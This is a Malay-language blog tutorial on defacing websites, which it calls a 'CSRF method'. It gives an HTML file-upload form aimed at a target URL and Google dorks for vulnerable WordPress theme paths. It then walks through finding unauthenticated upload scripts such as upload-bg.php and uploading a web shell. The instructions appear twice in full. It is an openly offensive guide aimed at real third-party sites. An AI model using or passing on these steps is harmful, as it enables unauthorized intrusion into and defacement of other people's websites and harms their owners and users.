Tutorial Deface Method CSRF
Assalammualaikum
hari nie aku nk ajar method CSRF
okayy
copy dulu code nie
save dekat notepad nama : CSRF.html
<form enctype="multipart/form-data" action="SITE TARGET" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="uploadfile" type="file" /><br /><input type="submit" value="upload" /></form>
*tukarkan site kepada site yang vuln nanti :)
Okay , 1st step
cari site menggunakan dork ini :
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
Dork nie bole dibesarkan :)
Okay
sekarang
masukkan salah satu dork itu dalam google/bing
contoh site : http://www.site.com/wp-content/themes/pacifico/
okayy
tambah kan theme dibelakang /pacifico
contoh : http://www.site.com/wp-content/themes/pacifico/theme
akan keluar mcm nie
pilih function kemudian pilih yang mana berkaitan dengan UPLOAD
contoh : upload.php , upload-bg.php dan sebagainya
Jika muncul "You Must Login....."atau blank? cari target lain!! :v "Jika muncul "error" berarti Web target Vulnerable" :v
Selepas tu , Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti SITETARGET dengan link yang berada di addres bar target kamu tadi.dan SAVE !
Contoh: "http://www.site.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
Kemudian , buka fail CSRF.html tersebut kemudian pilih SHELL dan UPLOAD :v
Jika tak paham , boleh tengok video ni :v
TONTON DISINI
Sekian , Terima Kasih :)
hari nie aku nk ajar method CSRF
okayy
copy dulu code nie
save dekat notepad nama : CSRF.html
<form enctype="multipart/form-data" action="SITE TARGET" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="uploadfile" type="file" /><br /><input type="submit" value="upload" /></form>
*tukarkan site kepada site yang vuln nanti :)
Okay , 1st step
cari site menggunakan dork ini :
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
Dork nie bole dibesarkan :)
Okay
sekarang
masukkan salah satu dork itu dalam google/bing
contoh site : http://www.site.com/wp-content/themes/pacifico/
okayy
tambah kan theme dibelakang /pacifico
contoh : http://www.site.com/wp-content/themes/pacifico/theme
akan keluar mcm nie
pilih function kemudian pilih yang mana berkaitan dengan UPLOAD
contoh : upload.php , upload-bg.php dan sebagainya
Jika muncul "You Must Login....."atau blank? cari target lain!! :v "Jika muncul "error" berarti Web target Vulnerable" :v
Selepas tu , Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti SITETARGET dengan link yang berada di addres bar target kamu tadi.dan SAVE !
Contoh: "http://www.site.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
Kemudian , buka fail CSRF.html tersebut kemudian pilih SHELL dan UPLOAD :v
Jika tak paham , boleh tengok video ni :v
TONTON DISINI
Sekian , Terima Kasih :)
Tutorial Deface Method CSRF
Reviewed by MrNewbie
on
00:28
Rating:
No comments: